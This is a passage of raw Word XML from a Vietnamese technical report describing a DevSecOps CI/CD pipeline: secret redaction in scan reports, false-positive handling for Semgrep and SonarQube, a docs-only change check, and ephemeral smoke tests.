          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>2.3.3. Tự động che giấu dữ liệu nhạy cảm trong báo cáo và trực quan hóa kết quả</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Text"/>
        <w:spacing w:line="300" w:lineRule="auto" w:before="0" w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Để tuân thủ triệt để nguyên tắc không để lộ dữ liệu bí mật (Zero-Trust Data Protection) trong môi trường CI/CD:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Bullet1"/>
        <w:spacing w:line="288" w:lineRule="auto" w:before="0" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Kịch bản </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>ci/semgrep_report.py</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> và </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>ci/sonarqube.py</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> tự động tích hợp cơ chế làm sạch dữ liệu (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>redact</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>). Toàn bộ các chuỗi mã token (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>SONAR_TOKEN</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">), khóa định danh SSH, chuỗi mật khẩu kết nối database có trong log kiểm thử đều được tự động thay thế thành chuỗi </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>[REDACTED]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> trước khi bất kỳ dòng nhật ký nào được xuất ra bảng điều khiển hoặc tệp báo cáo.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Bullet1"/>
        <w:spacing w:line="288" w:lineRule="auto" w:before="0" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Trực quan hóa kết quả kiểm định:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Kịch bản tự động bóc tách ngữ cảnh mã nguồn xung quanh vị trí lỗi, hiển thị rõ ràng dòng mã đóng vai trò </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Source</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> (dữ liệu đầu vào) và dòng mã đóng vai trò </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Sink</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> (thực thi nhạy cảm) ngay trên giao diện GitHub Actions Step Summary.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Bullet1"/>
        <w:spacing w:line="288" w:lineRule="auto" w:before="0" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Báo cáo kiểm định chi tiết được lưu trữ dưới dạng artifact độc lập (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>reports/semgrep/report.html</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> và </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>reports/sonarqube-report.html</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>) với thời hạn lưu trữ 30 ngày phục vụ công tác kiểm toán tuân thủ.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-H3"/>
        <w:spacing w:before="160" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>2.3.4. Quy trình thẩm định ngoại lệ và xử lý cảnh báo giả (False Positive Handling Protocol)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Text"/>
        <w:spacing w:line="300" w:lineRule="auto" w:before="0" w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Trường hợp một phát hiện từ SonarQube hoặc Semgrep được xác định là cảnh báo giả hoặc rủi ro đã có cơ chế phòng thủ bù trừ ở tầng biên (Compensating Controls tại WAF/Cloudflare):</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Kỹ sư phát triển lập biểu mẫu giải trình kỹ thuật gồm đường dẫn tệp tin, dòng mã phát hiện, bằng chứng chứng minh luồng thực thi không thể bị khai thác và cơ chế phòng thủ bổ sung.</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Trưởng nhóm An toàn thông tin (SecOps Lead) trực tiếp xác minh lại trên môi trường lab thực nghiệm.</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val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Khi được phê duyệt, ngoại lệ sẽ được xử lý:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Bullet2"/>
        <w:spacing w:line="288" w:lineRule="auto" w:before="0" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Đối với SonarQube: Đánh dấu trạng thái </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>False Positive</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> hoặc </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Won't Fix</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> trên giao diện quản trị có ghi kèm mã ticket phê duyệt.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Bullet2"/>
        <w:spacing w:line="288" w:lineRule="auto" w:before="0" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Đối với Semgrep: Chèn chú thích nội dòng </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>// nosemgrep: &lt;rule-id&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> kèm lý do và ngày phê duyệt, hoặc cập nhật trường loại trừ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>pattern-not</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> trong bộ quy tắc </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>ci/semgrep-local-rules.yml</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-H1"/>
        <w:spacing w:before="280" w:after="320"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>CHƯƠNG 3: ĐÓNG GÓI VÀ TỰ ĐỘNG TRIỂN KHAI LÊN MÁY CHỦ THỰC TẾ</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-H2"/>
        <w:spacing w:before="200" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="27"/>
        </w:rPr>
        <w:t>3.1. Chạy thử nghiệm hệ thống trên môi trường tạm thời tại Stage 3</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Text"/>
        <w:spacing w:line="300" w:lineRule="auto" w:before="0" w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Một trong những nguyên nhân hàng đầu khiến hệ thống Production sụp đổ sau khi triển khai là sai lệch cấu hình hạ tầng. Stage 3 thiết lập một rào chắn kiểm định kỹ thuật thông minh:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Bullet1"/>
        <w:spacing w:line="288" w:lineRule="auto" w:before="0" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Cơ chế nhận diện thông minh phạm vi thay đổi (`eval_stage3`):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Text"/>
        <w:spacing w:line="300" w:lineRule="auto" w:before="0" w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Trước khi khởi tạo môi trường tạm thời và kích hoạt việc đóng gói Docker Images, đường ống thực hiện bước đánh giá phạm vi thay đổi (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>eval_stage3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>). Kịch bản shell phân tích danh sách các tệp tin được chỉnh sửa giữa nhánh nguồn và nhánh đích:</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Trích đoạn logic nhận diện phạm vi commit trong devsecops-pipeline.yml</w:t>
              <w:br/>
              <w:t xml:space="preserve">  DOCS_ONLY=true</w:t>
              <w:br/>
              <w:t xml:space="preserve">  while IFS= read -r raw_file; do</w:t>
              <w:br/>
              <w:t xml:space="preserve">    file=$(echo "$raw_file" | sed 's/^"//; s/"$//' | xargs)</w:t>
              <w:br/>
              <w:t xml:space="preserve">    [ -z "$file" ] &amp;&amp; continue</w:t>
              <w:br/>
              <w:t xml:space="preserve">    if ! echo "$file" | grep -qE "^(docs/|\.github/.*\.md$|.*\.md$|.*\.docx$|\.gitignore$|LICENSE$)"; then</w:t>
              <w:br/>
              <w:t xml:space="preserve">      DOCS_ONLY=false</w:t>
              <w:br/>
              <w:t xml:space="preserve">      break</w:t>
              <w:br/>
              <w:t xml:space="preserve">    fi</w:t>
              <w:br/>
              <w:t xml:space="preserve">  done &lt;&lt;&lt; "$CHANGED_FILES"</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Text"/>
        <w:spacing w:line="300" w:lineRule="auto" w:before="0" w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Nếu toàn bộ các tệp được chỉnh sửa trong commit chỉ thuộc nhóm tài liệu kỹ thuật (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>docs/**</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>*.md</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>*.docx</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>.gitignore</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>LICENSE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">), hệ thống tự động thiết lập cờ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>skip_stage3=true</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> và bỏ qua toàn bộ công đoạn Docker Build và Ephemeral Smoke Test. Cơ chế thông minh này giúp tiết kiệm 100% tài nguyên CPU/RAM của máy ảo Runner, rút ngắn thời gian phản hồi từ 5 phút xuống còn dưới 10 giây đối với các lần cập nhật tài liệu kỹ thuật mà vẫn đảm bảo tính an toàn tuyệt đối.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Bullet1"/>
        <w:spacing w:line="288" w:lineRule="auto" w:before="0" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Quy trình kiểm định kỹ thuật 3 tầng khi có thay đổi mã nguồn:</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Bộ thẩm định cấu hình tĩnh (`ci/validate_configs.py`):</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Thực thi kiểm tra tự động 21/21 trường hợp thử nghiệm nghiêm ngặt:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Bullet2"/>
        <w:spacing w:line="288" w:lineRule="auto" w:before="0" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Thẩm định cấu hình Docker Compose theo chuẩn Compose Specification V2.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Bullet2"/>
        <w:spacing w:line="288" w:lineRule="auto" w:before="0" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Thẩm định tính hợp lệ của cú pháp ánh xạ đường dẫn log trong cấu hình Promtail </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>promtail-config.yml</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Kiểm tra tính đúng đắn của sơ đồ cấu hình lưu trữ chunks và bảng chỉ mục của Grafana Loki </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>loki-config.yml</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Khởi tạo môi trường chạy thử tạm thời:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Text"/>
        <w:spacing w:line="300" w:lineRule="auto" w:before="0" w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Thay vì tin tưởng mù quáng vào việc build image thành công, đường ống khởi chạy một cụm dịch vụ hoàn chỉnh bao gồm cả web, database MariaDB, Loki và Promtail ngay trong máy ảo Runner của GitHub Actions để thử nghiệm độc lập mà không ảnh hưởng tới máy chủ thật.</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Kiểm thử nhịp tim đầu cuối:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Bullet2"/>
        <w:spacing w:line="288" w:lineRule="auto" w:before="0" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Runner thực hiện truy vấn thăm dò tính sẵn sàng của cơ sở dữ liệu qua lệnh </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>mysqladmin ping</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Gửi yêu cầu HTTP Request tới endpoint </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>/health</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>, kiểm tra tính toàn vẹn của phản hồi JSON:</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w:t>
              <w:br/>
              <w:t xml:space="preserve">       "status": "UP",</w:t>
              <w:br/>
              <w:t xml:space="preserve">       "database": "connected",</w:t>
              <w:br/>
              <w:t xml:space="preserve">       "timestamp": "2026-10-23T14:05:00Z"</w:t>
              <w:br/>
              <w:t xml:space="preserve">     }</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Bullet2"/>
        <w:spacing w:line="288" w:lineRule="auto" w:before="0" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Kiểm tra tính sẵn sàng nạp log của Loki thông qua endpoint </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>http://localhost:3100/ready</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-H2"/>
        <w:spacing w:before="200" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="27"/>
        </w:rPr>
        <w:t>3.2. Đóng gói Docker Image và lưu trữ trên GitHub Container Registry</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Text"/>
        <w:spacing w:line="300" w:lineRule="auto" w:before="0" w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
